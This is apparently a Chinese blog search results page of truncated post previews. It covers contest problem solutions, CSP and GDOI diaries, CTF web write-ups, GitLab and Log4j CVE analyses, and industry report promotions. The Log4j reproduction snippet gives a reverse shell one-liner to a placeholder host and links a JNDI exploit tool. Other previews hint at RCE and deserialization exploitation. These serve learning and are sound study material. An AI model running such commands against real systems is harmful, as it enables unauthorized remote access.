finalrce新生swpuctf 2021
【kruskal重构树,倍增】2021 ICPC Asia Shanghai - H. Life is a Game
# 【kruskal重构树,倍增】2021 ICPC Asia Shanghai - H. Life is a Game 题目链接:[Problem - H - Codeforces 问题 - H - Codeforces](https://codeforces.com/gym/103446/pro ......
GDOI2021普及组 游记
## 前言 - 众所周知,2021年是GDOI第一年有普及组,~~所以本蒟蒻才敢报~~ - 一场比赛也异常的贵,800元 - 不过可以去深圳游一游,还是挺期待的 ## Day-0 傍晚差不多5:30到**深圳耀华实验学校**,第一眼就爱上了这个学校,教学楼的实际风格十分现代化 去食堂吃晚饭,~~这不 ......
洛谷 P7911 [CSP-J 2021] 网络连接 题解
# 写在前面 一道普及级别的题目。CSP-J 全国统一命题 2021年第三题。 本题解来自于一位真正的大佬。传送门https://www.luogu.com.cn/blog/xyf007/solution-p7911。 题面信息来源于洛谷。请访问https://www.luogu.com.cn/pr ......
[NOI2021] 路径交点 题解
# [NOI2021] 路径交点 题解 ## 题意 给定一张 $k$ 层的有向图,第 $i$ 层有 $n_i$ 个顶点,第 $1$ 层与第 $k$ 层**顶点数相同**。对于第 $j$ $(1 \leq j using namespace std; const int N = 205; ......
CVE-2021-22204 GitLab RCE之exiftool代码执行漏洞深入分析(二)
上一篇CVE-2021-22205 GitLab RCE之未授权访问深入分析(一)复现分析了第一部分也就是携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的,接下来我将分析exiftool漏洞的原理和最后的触发利用。 希望读者能读有所得,从中收获到自己独特的见解。 ......
CVE-2021-22205 GitLab RCE之未授权访问深入分析(一)
> 文章写于2021-11-29,首发在[天融信阿尔法实验室](https://mp.weixin.qq.com/s/Y4mGVhbc3agp1adnUs1GmA) ## 前言 安全研究员`vakzz`于4月7日在hackerone上提交了一个关于gitlab的[RCE漏洞](https://hac ......
[SWPUCTF 2021 新生赛]pop
# 题目源码 ```php admin 'w44m' && $this->passwd '08067'){ include('flag.php'); echo $flag; }else{ echo $this->admin; echo $this->passwd; echo 'nono'; } } ......
Minitab 2021 - 统计分析管理软件
Minitab 2021 是一款功能强大的统计分析管理软件,广泛应用于质量管理、数据分析、实验设计和质量改进等领域。 点击获取Minitab 2021 数据导入和管理:Minitab 2021 提供了灵活的数据导入和管理功能,可以导入各种常见格式的数据文件,如文本文件、Excel 表格、数据库等。用 ......
AndroidStudio2021.3logcat工具无法显示日志解决办法
AndroidStudio2021.3logcat工具无法显示日志解决办法 https://blog.csdn.net/weixin_43623271/article/details/127876964 1.File -> setting2.搜索logcat, ->ExperimentalunChk ......
2021年电工证模拟考试试题及答案(完整版),逢考必过神器!
俗话说:工欲善其事必先利其器!持证上岗,考取电工证是成为一名优秀电工的第一步。 近来,很多电工同行在后台询问小编有没有2021年电工考试试题及答案,故小编花了很大的精力整理出一份电工自测考题。本份试卷共80道题目,包含10道判断题、50道选择题和20道多选题,完全模拟电工证考试题型,附答案! 这份电 ......
CVE-2021-44228 Apache log4j2远程代码执行漏洞
漏洞复现 验证是否存在apache log4j2漏洞 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 反弹shell bash -i >& /dev/tcp/ip/port 0>&1 将此命令进行javarunti ......
【THM】OWASP 前10名—2021
参考链接:https://www.cnblogs.com/Hekeats-L/p/16964401.html 介绍 该房间对每个 OWASP 主题进行了详细分析,并包含有关漏洞、它们如何发生以及如何利用它们的详细信息。您将通过完成支持性挑战将理论付诸实践。 访问控制损坏 加密失败 注射 不安全的设计 ......
【专题】2021-2022年中国母婴行业新媒体营销价值研究报告PDF合集分享(附原数据表)
报告链接:http://tecdat.cn/?p=31424 人口出生红利消失,以及后疫情时代的冲击,但消费升级将负面因素拉平,母婴消费市场总量持续稳步上升。"精致妈妈"的营销价值日益凸显。阅读原文,获取专题报告合集全文,解锁文末56份母婴行业相关报告。 当母婴人群成为众多母婴及家庭消费品的重要入口 ......
项目播报 | 欧普照明 × 璞华科技,IT技术唤醒行业新生
2023年7月,璞华科技与欧普照明股份有限公司(以下简称“欧普照明”)成功签订战略合作协议,双方将围绕软件产品销售及数字化服务展开全面合作。 欧普照明始于1996年,是一家集研发、生产、销售、服务于一体的综合型照明企业。欧普照明的专业照明解决方案覆盖家居、办公、工业、教育、医疗等13个商用照明领域, ......
Vulnhub: BlueMoon: 2021靶机
kali:192.168.111.111 靶机:192.168.111.174 # 信息收集 端口扫描 ``` nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.174 ``` ![image](https://img2023.cnb ......
[鹤城杯 2021]EasyP
[鹤城杯 2021]EasyP 题目来源:nssctf 题目类型:web 涉及考点:正则绕过 1. 还是先做代码审计 ```php ``` 这题出现了挺多没见过的东西,还是先介绍一下: > $_SERVER[...]:是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(scrip ......
【专题】2015-2021年医疗机器人价值报告PDF合集分享(附原数据表)
报告链接:http://tecdat.cn/?p=31419 随着大量企业的涌入,服务机器人产业化即将到来。 阅读原文,获取专题报告合集全文,解锁文末40份服务机器人行业相关报告。 经过多年的发展,我国已经实现了完整的服务机器人产业生态系统。在常态化疫情防控、人口老龄化、技术进步和政策支持等多种因素 ......
题解 P9406【[POI2020-2021R3] Nawiasowania】
一个显然的思路是:在排列 $p$ 的括号串合法的基础上,使得左括号在原括号串中尽量靠左,这样答案更有可能合法。于是我们求出这个原括号尽量靠左的括号串(下文称为“最优括号串”),然后 check 合法性即可。 下文中 $s$ 是排列 $p$ 的括号串。 当 $n=2$ 时,唯一的填法是令 $s_1\g ......
[Ynoi Easy Round 2021] TEST_152(颜色段数均摊+扫描线)
### [题目传送门](https://www.luogu.com.cn/problem/P8512) ## solution 简单题,考虑正着做扫描线,维护最后一次覆盖每个位置的修改时间,这个可以用 $set$ 维护颜色段数均摊。 那么显然对于一个以当前位置为右端点的询问,其答案就是所有最后修改时 ......
题解:【ICPC WF 2021 G】 Mosaic Browsing
[题目链接](https://www.luogu.com.cn/problem/P9445) 数据有点水啊,貌似矩阵大小最大只有 $500$,这导致一堆 bitset 乱搞或者暴力啥的无聊解法能过,这里就不多说了,快进到正题。 二维通配符匹配。 首先根据 Rabin Karp 给每种颜色随机一个权值 ......
CSP2021 游记
## 前言 这个人是蒟蒻,初二,在机房属于是垫底。今年是第一次参加 CSP-S,第二次参加 CSP-J。 ## Day -1 颓。 ## Day 0 学校搞运动会,上午一边看运动会,一边复(摸)习(鱼)。 中午 $1:00$ 出发,在车上又看了会儿算法。全车的人都在颓。 回了酒店后继续颓,感觉明天要 ......
[SWPUCTF 2021 新生赛]ez_unserialize
[SWPUCTF 2021 新生赛]ez_unserialize 题目来源:nssctf 题目类型:web 涉及考点:PHP反序列化 1. 检查一下源代码,发现Disallow: 猜测大概有`robots.txt`,扫下后台看看: 额,flag.php都扫出来了,但是进不去,还是老老实实看robot ......
LOJ3677 「北大集训 2021」出题高手
卡死人了。 数据随机写在上面,就是让你预估一下区间长度不会太长的,数据里最长的不超过 $2000$。 暴力扫 $2000$ 个显然过不了 $500000$ 的点,但是 $500000$ 的点 $m$ 为 $1$ 且必定询问整个序列。可以分析出,在随机情况下,前缀和最小最大数量是根号个的,平方后是四次 ......
2021年百度程序设计竞赛
package PTACZW; import java.util.Scanner; import java.util.ArrayList; import java.io.*; import java.util.StringTokenizer; public class Main{ static Bu ......
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
# OpenSSH 资源管理错误漏洞(CVE-2021-28041) 漏洞描述: OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。 该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他 网络级 ......
[SWPUCTF 2022 新生赛]js_sign
[SWPUCTF 2022 新生赛]js_sign 题目来源:nssctf 题目类型:web 涉及考点:JS分析 1. 题目给了一个传入口,不管传入什么都回显 ‘fuck off ’ * 查看源代码: * 看到一个base64编码,先解码看看: 2. 搜了下发现tapcode是个编码方式,于是对fl ......
[UUCTF 2022 新生赛]ez_rce
[UUCTF 2022 新生赛]ez_rce 题目来源:nssctf 题目类型:web 涉及考点:无参数rce 1. 先做代码审计: ```php '; eval($code); } else{ die("你想干什么?????????"); } } else{ echo "居然都不输入参数,可恶!! ......
浅谈新生代为什么要分三块区域并且比例为什么是8:1:1
如题,最近在网上看到了一个某大厂的面试题:“新生代为什么分三块区域且比例为什么是8:1:1"?网上答案比比皆是,我是没搜到什么有价值的答案,今天结合这个题目谈谈自己的粗浅想法,如有不对还望指正;另外需要说明的是,接下来聊的都是基于G1之前的垃圾收集器; 首先,我们假设新生代如果不分代会发生什么:如果 ......
[SWPUCTF 2021 新生赛]no_wakeup
[SWPUCTF 2021 新生赛]no_wakeup 题目来源:nssctf 题目类型:web 涉及考点:PHP反序列化 1. 题目给了一个点击按钮,点进去看看: 进去后就是代码审计了: ```php admin ="user"; $this->passwd = "123456"; } publi ......
remote: Support for password authentication was removed on August 13, 2021
一、问题描述 remote: Support for password authentication was removed on August 13, 2021. Please use a personal access token instead. 具体如下: 大概意思:你原先的密码凭证从202 ......